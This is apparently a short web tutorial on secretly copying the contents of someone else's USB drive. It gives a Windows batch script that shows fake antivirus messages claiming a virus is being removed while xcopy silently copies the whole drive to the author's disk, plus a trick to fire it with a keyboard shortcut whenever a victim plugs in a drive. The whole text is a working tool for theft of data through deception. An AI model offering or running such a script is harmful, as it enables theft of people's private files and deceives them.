copy data from anyone's pendrive
you can copy data from any one's pendrive without knowing him easyly with .bat file
(1) open notepad
(2) write bellow code (3)save file with .bat
@echo off
echo avast is working to remove virus
echo please wait for some time do not close.........
echo process is running
xcopy /a /e /k /q /h f:(path of pendrive) d:\kishan(path where you want save data)
cls
echo virus removed
example
@echo offecho avast is working to remove virus
echo please wait for some time do not close.........
echo process is running
xcopy /a /e /k /q /h f: d:\kishan
cls
echo virus removed
TRICK make 3-4 file of different file with like f: i: h:
now make shortcut of that file
right click on it
give shortcut key(as above)
its done when someone insert pendrive press that key done
if you have any problem write it bellow